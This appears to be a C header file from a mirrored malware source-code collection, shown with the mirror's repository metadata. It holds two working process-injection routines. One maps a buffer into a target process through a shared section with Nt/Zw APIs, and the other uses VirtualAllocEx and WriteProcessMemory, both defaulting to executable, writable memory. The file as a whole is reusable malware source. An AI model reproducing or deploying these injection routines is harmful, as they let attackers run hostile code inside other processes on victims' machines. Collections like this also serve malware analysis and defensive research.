mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-15 07:19:23 +00:00
vxunderground
68 lines
2.5 KiB
C
68 lines
2.5 KiB
C
#pragma once
|
|
#include <stdio.h> // for printf
|
|
#include <wchar.h>
|
|
#include "ntddk.h"
|
|
|
|
//set of alternative functions doing the same by a different way
|
|
|
|
PVOID map_buffer_into_process1(HANDLE hProcess, LPBYTE buffer, SIZE_T buffer_size, DWORD protect = PAGE_EXECUTE_READWRITE)
|
|
{
|
|
HANDLE hSection = NULL;
|
|
OBJECT_ATTRIBUTES hAttributes;
|
|
memset(&hAttributes, 0, sizeof(OBJECT_ATTRIBUTES));
|
|
|
|
LARGE_INTEGER maxSize;
|
|
maxSize.HighPart = 0;
|
|
maxSize.LowPart = static_cast<DWORD>(buffer_size);
|
|
NTSTATUS status = NULL;
|
|
if ((status = ZwCreateSection( &hSection, SECTION_ALL_ACCESS, NULL, &maxSize, protect, SEC_COMMIT, NULL)) != STATUS_SUCCESS)
|
|
{
|
|
printf("[ERROR] ZwCreateSection failed, status : %x\n", status);
|
|
return NULL;
|
|
}
|
|
|
|
PVOID sectionBaseAddress = NULL;
|
|
ULONG viewSize = 0;
|
|
SECTION_INHERIT inheritDisposition = ViewShare; //VIEW_SHARE
|
|
|
|
// map the section in context of current process:
|
|
if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(), §ionBaseAddress, NULL, NULL, NULL, &viewSize, inheritDisposition, NULL, protect)) != STATUS_SUCCESS)
|
|
{
|
|
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
|
|
return NULL;
|
|
}
|
|
printf("Section BaseAddress: %p\n", sectionBaseAddress);
|
|
|
|
memcpy (sectionBaseAddress, buffer, buffer_size);
|
|
printf("Buffer copied!\n");
|
|
|
|
//map the new section into context of opened process
|
|
PVOID sectionBaseAddress2 = NULL;
|
|
if ((status = NtMapViewOfSection(hSection, hProcess, §ionBaseAddress2, NULL, NULL, NULL, &viewSize, ViewShare, NULL, protect)) != STATUS_SUCCESS)
|
|
{
|
|
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
|
|
return NULL;
|
|
}
|
|
|
|
//unmap from the context of current process
|
|
ZwUnmapViewOfSection(GetCurrentProcess(), sectionBaseAddress);
|
|
ZwClose(hSection);
|
|
|
|
printf("Section mapped at address: %p\n", sectionBaseAddress2);
|
|
return sectionBaseAddress2;
|
|
}
|
|
|
|
LPVOID map_buffer_into_process2(HANDLE hProcess, LPBYTE buffer, SIZE_T buffer_size, DWORD protect = PAGE_EXECUTE_READWRITE)
|
|
{
|
|
LPVOID remoteAddress = VirtualAllocEx(hProcess, NULL, buffer_size, MEM_COMMIT | MEM_RESERVE, protect);
|
|
if (remoteAddress == NULL) {
|
|
printf("Could not allocate memory in the remote process\n");
|
|
return NULL;
|
|
}
|
|
if (!WriteProcessMemory(hProcess, remoteAddress, buffer, buffer_size, NULL)) {
|
|
VirtualFreeEx(hProcess,remoteAddress, buffer_size, MEM_FREE);
|
|
return NULL;
|
|
}
|
|
return remoteAddress;
|
|
}
|